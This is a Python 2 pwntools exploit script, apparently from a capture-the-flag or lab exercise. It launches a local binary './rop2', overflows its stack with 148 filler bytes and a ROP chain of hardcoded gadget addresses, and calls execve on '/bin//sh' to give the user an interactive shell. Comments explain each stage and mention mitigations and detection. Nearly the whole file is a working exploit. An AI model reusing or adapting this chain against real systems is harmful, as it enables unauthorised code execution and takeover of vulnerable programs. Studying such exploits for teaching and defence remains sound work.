#!/usr/bin/python

from pwn import *
from struct import pack
# Padding goes here
#
# ROP chain that the main() below delivers after the stack filler.  It is
# built as a Python 2 ``str``: ``struct.pack`` returns ``str`` there, and
# ``'' + bytes`` would raise TypeError on Python 3.  Note that
# ``from struct import pack`` (L4) shadows the ``pack`` exported by
# ``from pwn import *``; the struct version is the one used here.
#
# Every gadget address is an absolute 0x0804xxxx-0x080dxxxx value, i.e. the
# target is a non-PIE 32-bit binary: PIE/ASLR would break this chain, and a
# stack canary would stop the overflow that delivers it.  Defensively, the
# observable effect is the target process calling execve() on "/bin//sh",
# which execve auditing on a non-shell parent should flag.
p = ''

# Stage 1: store the NUL-terminated string "/bin//sh" into .data, three
# 4-byte writes of the form pop edx (address) / pop eax (value) / mov [edx], eax.
p += pack('<I', 0x0807296b) # pop edx ; ret
p += pack('<I', 0x080de060) # @ .data
p += pack('<I', 0x080ac946) # pop eax ; ret
p += '/bin'                 # bytes 0-3 of the string (raw, not an address)
p += pack('<I', 0x08056de5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0807296b) # pop edx ; ret
p += pack('<I', 0x080de064) # @ .data + 4
p += pack('<I', 0x080ac946) # pop eax ; ret
p += '//sh'                 # bytes 4-7 of the string
p += pack('<I', 0x08056de5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0807296b) # pop edx ; ret
p += pack('<I', 0x080de068) # @ .data + 8
p += pack('<I', 0x080563a0) # xor eax, eax ; ret  -- eax = 0 (the terminating NUL dword)
p += pack('<I', 0x08056de5) # mov dword ptr [edx], eax ; ret

# Stage 2: load the int 0x80 argument registers.  On 32-bit Linux eax selects
# the syscall and ebx/ecx/edx carry the first three arguments, so this sets
# ebx = &"/bin//sh", ecx = &NULL (argv), edx = &NULL (envp).
p += pack('<I', 0x080481d1) # pop ebx ; ret
p += pack('<I', 0x080de060) # @ .data
p += pack('<I', 0x08072992) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080de068) # @ .data + 8  -> ecx
p += pack('<I', 0x080de060) # padding without overwrite ebx (re-pops the same .data pointer into ebx)
p += pack('<I', 0x0807296b) # pop edx ; ret
p += pack('<I', 0x080de068) # @ .data + 8  -> edx

# Stage 3: eax = 11 via xor + eleven increments (11 is __NR_execve on i386
# Linux; the gadget set has no usable "pop eax" with a clean small immediate).
p += pack('<I', 0x080563a0) # xor eax, eax ; ret
p += pack('<I', 0x0807fdfa) # inc eax ; ret
p += pack('<I', 0x0807fdfa) # inc eax ; ret
p += pack('<I', 0x0807fdfa) # inc eax ; ret
p += pack('<I', 0x0807fdfa) # inc eax ; ret
p += pack('<I', 0x0807fdfa) # inc eax ; ret
p += pack('<I', 0x0807fdfa) # inc eax ; ret
p += pack('<I', 0x0807fdfa) # inc eax ; ret
p += pack('<I', 0x0807fdfa) # inc eax ; ret
p += pack('<I', 0x0807fdfa) # inc eax ; ret
p += pack('<I', 0x0807fdfa) # inc eax ; ret
p += pack('<I', 0x0807fdfa) # inc eax ; ret
p += pack('<I', 0x08049643) # int 0x80  -- issue the syscall
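def main():
    """Launch ./rop2, build the overflow payload, save a copy and hand the session to the user.

    Reads the module-level chain ``p``.  Python 2 only: the payload is a
    ``str`` and ``raw_input`` is used for the pause.

    Side effects: spawns ./rop2, writes ``shellcode2`` in the current
    directory, blocks on stdin once, then enters pwntools interactive mode.
    """
    # start the process
    pro = process("./rop2")

    # Craft the payload: 148 filler bytes (presumably the distance to the
    # saved return address for this binary -- TODO confirm), then the chain,
    # then NUL padding out to 1000 bytes (presumably the size of the
    # target's read -- TODO confirm).
    payload = "A" * 148
    payload += p
    payload = payload.ljust(1000, "\x00")

    # Pause so the pid can be read before the payload is sent (e.g. to
    # attach a debugger); any line of input resumes.
    raw_input(str(pro.proc.pid))

    # Keep a copy of the exact bytes sent, for replay/analysis.  The context
    # manager closes the file even if write() raises, which the original
    # open/write/close sequence did not guarantee.
    with open("shellcode2", "w") as f:
        f.write(payload)

    # send the payload
    pro.send(payload)

    # transfer interaction to the user
    pro.interactive()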

# Only run the exploit driver when executed as a script, not on import.
if __name__ == '__main__':
    main()
